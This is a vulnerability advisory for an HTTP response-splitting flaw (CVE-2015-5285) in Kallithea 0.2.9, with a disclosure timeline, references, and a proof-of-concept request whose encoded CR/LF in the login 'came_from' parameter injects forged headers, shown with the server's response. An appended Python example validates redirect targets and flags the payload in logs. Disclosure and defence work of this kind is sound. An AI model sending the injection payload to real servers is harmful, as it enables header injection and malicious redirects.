
Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability

2015-10-07 00:00:00
Gjoko Krstic
zeroscience.mk

CVSS2: 5 Medium (AV:N/AC:L/Au:N/C:N/I:P/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: PARTIAL
  Availability Impact: NONE

AI Score: 6.5 Medium (Confidence: High)

EPSS: 0.062 Low (Percentile: 93.6%)

Title: Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
Advisory ID: ZSL-2015-5267
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 07.10.2015

Summary

Kallithea, a member project of Software Freedom Conservancy, is a GPLv3’d, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins.

Description

Kallithea suffers from an HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET ‘came_from’ parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

Vendor

Kallithea - <https://www.kallithea-scm.org>

Affected Version

0.2.9 and 0.2.2

Tested On

Kali
Python

Vendor Status

[21.09.2015] Vulnerability discovered.
[22.09.2015] Vendor contacted.
[22.09.2015] Vendor responds asking more details.
[23.09.2015] Sent details to the vendor.
[23.09.2015] Vendor confirms the issue, planning to fix it in version 0.3.
[24.09.2015] Working with the vendor.
[24.09.2015] CVE-2015-5285 assigned.
[02.10.2015] Vendor releases version 0.3 to address this issue.
[07.10.2015] Coordinated public security advisory released.

PoC

kallithea_http.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Mads and Andrew!

References

[1] <https://kallithea-scm.org/news/release-0.3.html>
[2] <https://kallithea-scm.org/security/cve-2015-5285.html>
[3] <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] <https://vulners.com/cve/CVE-2015-5285>
[5] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5285>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/106915>
[7] <https://cxsecurity.com/issue/WLB-2015100066>
[8] <https://packetstormsecurity.com/files/133897/Kallithea-0.2.9-HTTP-Response-Splitting.html>
[9] <https://www.exploit-db.com/exploits/38424/>

Changelog

[07.10.2015] - Initial release
[11.10.2015] - Added reference [6], [7] and [8]
[12.10.2015] - Added reference [9]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

Attached PoC file (kallithea_http.txt):

Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability


Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2

Summary: Kallithea, a member project of Software Freedom Conservancy,
is a GPLv3'd, Free Software source code management system that supports
two leading version control systems, Mercurial and Git, and has a web
interface that is easy to use for users and admins.

Desc: Kallithea suffers from an HTTP header injection (response splitting)
vulnerability because it fails to properly sanitize user input before
using it as an HTTP header value via the GET 'came_from' parameter in
the login instance. This type of attack not only allows a malicious
user to control the remaining headers and body of the response the
application intends to send, but also allows them to create additional
responses entirely under their control.

Tested on: Kali
           Python


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285


21.09.2015

--


GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

###

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<title>302 Found</title>
<h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
you should be redirected automatically.
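The Description and the PoC request/response above show the mechanism: the percent-encoded CR/LF (`%0d%0a`) inside `came_from` is decoded and copied into the `Location` header, so the server emits the injected `X-Forwarded-Host` and second `Location` lines as real headers. The following Python is an added example, not code from the advisory or from the Kallithea project, showing the defender's side of that mechanism: `safe_came_from()` validates a redirect target the way a login handler should before writing it into a `Location` header (rejecting any control character and anything that is not a same-origin path), and `flag_crlf_in_query()` scans access-log lines for request URIs that decode to control characters, as the PoC request does. The function names, the log format and the log lines (including the client IP) are assumptions constructed for this example.

```python
"""Added example (not from the advisory or the Kallithea project): validating
a `came_from` redirect target before it reaches a Location header, and
flagging the encoded CR/LF pattern of the PoC request in access-log lines.
Function names and the sample log lines are constructed for this example."""
import re
from urllib.parse import unquote, urlsplit

# CR, LF and every other ASCII control character: any one of these in a
# header value is what turns a plain redirect into response splitting.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def safe_came_from(raw: str, default: str = "/") -> str:
    """Return a redirect path that is safe to copy into a Location header.

    Decode once (so %0d%0a cannot hide from the check), refuse any control
    character, and require a same-origin absolute path: no scheme, no host,
    no protocol-relative '//host' form, no backslash (some browsers treat
    '/\\host' like '//host'). Anything failing falls back to `default`.
    """
    candidate = unquote(raw or "")
    # Check controls on the decoded string first: urlsplit() silently strips
    # tab/CR/LF, so checking after it would miss exactly this injection.
    if _CONTROL_CHARS.search(candidate):
        return default
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return default
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return default
    if "\\" in candidate:
        return default
    return candidate


def build_location_header(came_from: str) -> str:
    """Header line a login handler would emit after a successful login."""
    return f"Location: {safe_came_from(came_from)}"


# Constructed access-log lines (Common Log Format). The client IP is made up;
# the second line carries the request URI from the advisory's PoC.
CONSTRUCTED_ACCESS_LOG = [
    '192.168.0.50 - - [21/Sep/2015:13:57:40 +0000] '
    '"GET /_admin/login?came_from=%2F HTTP/1.1" 200 4120',
    '192.168.0.50 - - [21/Sep/2015:13:58:05 +0000] '
    '"GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk'
    '%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1" 302 411',
]

_REQUEST_URI = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/\d\.\d"')


def flag_crlf_in_query(log_lines):
    """Return the log lines whose request URI decodes to a control character.

    Decoding once catches %0d/%0a in either case as well as the %01%02 bytes
    seen in the PoC; a URI that is clean after one decode is left alone.
    """
    hits = []
    for line in log_lines:
        match = _REQUEST_URI.search(line)
        if match and _CONTROL_CHARS.search(unquote(match.group(1))):
            hits.append(line)
    return hits


if __name__ == "__main__":
    poc = ("d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
           "%01%02%0d%0aLocation%3a%20http://zeroscience.mk")
    print(build_location_header(poc))                # Location: /
    print(build_location_header("%2Frepos%2Ftest"))  # Location: /repos/test
    for hit in flag_crlf_in_query(CONSTRUCTED_ACCESS_LOG):
        print("suspicious request:", hit)
```

The validator deliberately does more than strip CR/LF: an open redirect through `came_from` to an off-site host is the next thing a reviewer would ask about, so only same-origin paths pass. The log scanner decodes the URI once and looks for any control character rather than matching the literal `%0d%0a` string, so mixed-case encodings and the other control bytes in the PoC are caught with the same rule.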
